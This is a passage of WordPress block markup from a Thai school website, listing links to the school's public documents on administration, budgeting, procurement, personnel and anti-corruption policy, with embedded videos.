{\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://youtu.be/C9do6YkaRVU?si=6QeXpJR-PUh7xatA\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:video {\"id\":64,\"align\":\"center\"} -->\n<figure class=\"wp-block-video aligncenter\"><video controls poster=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/VTR-แนะนำโรงเรียน.png\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/วันครู-1.mp4\"></video></figure>\n<!-- /wp:video -->\n\n<!-- wp:embed {\"url\":\"https://youtu.be/i-C4sNY7Mf8?si=HVfhH_a_V4qo3m9e\",\"type\":\"video\",\"providerNameSlug\":\"youtube\",\"responsive\":true,\"className\":\"wp-embed-aspect-16-9 wp-has-aspect-ratio\"} -->\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\nhttps://youtu.be/i-C4sNY7Mf8?si=HVfhH_a_V4qo3m9e\n</div></figure>\n<!-- /wp:embed --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"8a0e429c\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:group {\"layout\":{\"type\":\"flex\",\"orientation\":\"vertical\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/container {\"uniqueId\":\"af4cbf6d\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:group {\"style\":{\"layout\":{\"selfStretch\":\"fill\",\"flexSize\":null}},\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"5869148e\",\"mediaId\":260,\"sizeSlug\":\"large\",\"alignment\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-5869148e\"><img class=\"gb-image gb-image-5869148e\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/O27-1024x576.jpg\" alt=\"\" title=\"O27\"/></figure>\n<!-- /wp:generateblocks/image --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1ZP0lY1uWV2IQ20oOS1Vb_P11dTUVoRrK/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1ZP0lY1uWV2IQ20oOS1Vb_P11dTUVoRrK/view?usp=share_link\">แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\">แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\">คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</a></strong><br> <a href=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\">    - คู่มือฝ่ายบริหารงานงบประมาณ</a><br> <a href=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\"> - คู่มือฝ่ายบริหารงานวิชาการ</a><br> <a href=\"https://drive.google.com/file/d/1qKTCUzkpxq5KGBSV23JUe989WP112FZv/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1qKTCUzkpxq5KGBSV23JUe989WP112FZv/view?usp=share_link\">- คู่มือฝ่ายบริหารงานบุคคล</a><br> <a href=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\">  </a><a href=\"https://drive.google.com/file/d/14pibk03Y3KVvKw1bp6bOYJB0RjcxVkC2/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/14pibk03Y3KVvKw1bp6bOYJB0RjcxVkC2/view?usp=share_link\">- คู่มือฝ่ายบริหารงานทั่วไป</a></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">สถิติการมาเรียน </a><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">ตรวจสอบผลการเรียน</a><br>      -  <a href=\"https://www.obec.go.th\" data-type=\"link\" data-id=\"https://www.obec.go.th\">OBEC</a><br>      -  <a href=\"http://contentcenter.obec.go.th\" data-type=\"link\" data-id=\"http://contentcenter.obec.go.th\">OBEC Content Center</a><br>      -  <a href=\"https://a6702.obec.expert/authen/login\" data-type=\"link\" data-id=\"https://a6702.obec.expert/authen/login\">School MIS</a><br>      -  <a href=\"https://portal.bopp-obec.info/obec67\" data-type=\"link\" data-id=\"https://portal.bopp-obec.info/obec67\">ข้อมูลนักเรียนรายบุคคล (DMC)</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\">ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1HgGDEc5Rx8qn95aySOUn58ERju9XxhA4/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1HgGDEc5Rx8qn95aySOUn58ERju9XxhA4/view?usp=share_link\">ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">ร</a><a href=\"https://drive.google.com/file/d/1iNx6GzzU16YF1hChm0Wpd48vl4RjwLvq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1iNx6GzzU16YF1hChm0Wpd48vl4RjwLvq/view?usp=share_link\">ายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\">รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\">การขับเคลื่อนจริยธรรม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://forms.gle/KBRUecqKvRqxgrPm7\" data-type=\"link\" data-id=\"https://forms.gle/KBRUecqKvRqxgrPm7\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\">ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\">การสร้างวัฒนธรรม&nbsp; No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\">รายงานผลตามนโยบาย No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1QpgojOLg93xMFq319R5HXVloKfolMM6v/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QpgojOLg93xMFq319R5HXVloKfolMM6v/view?usp=share_link\">รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\">รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 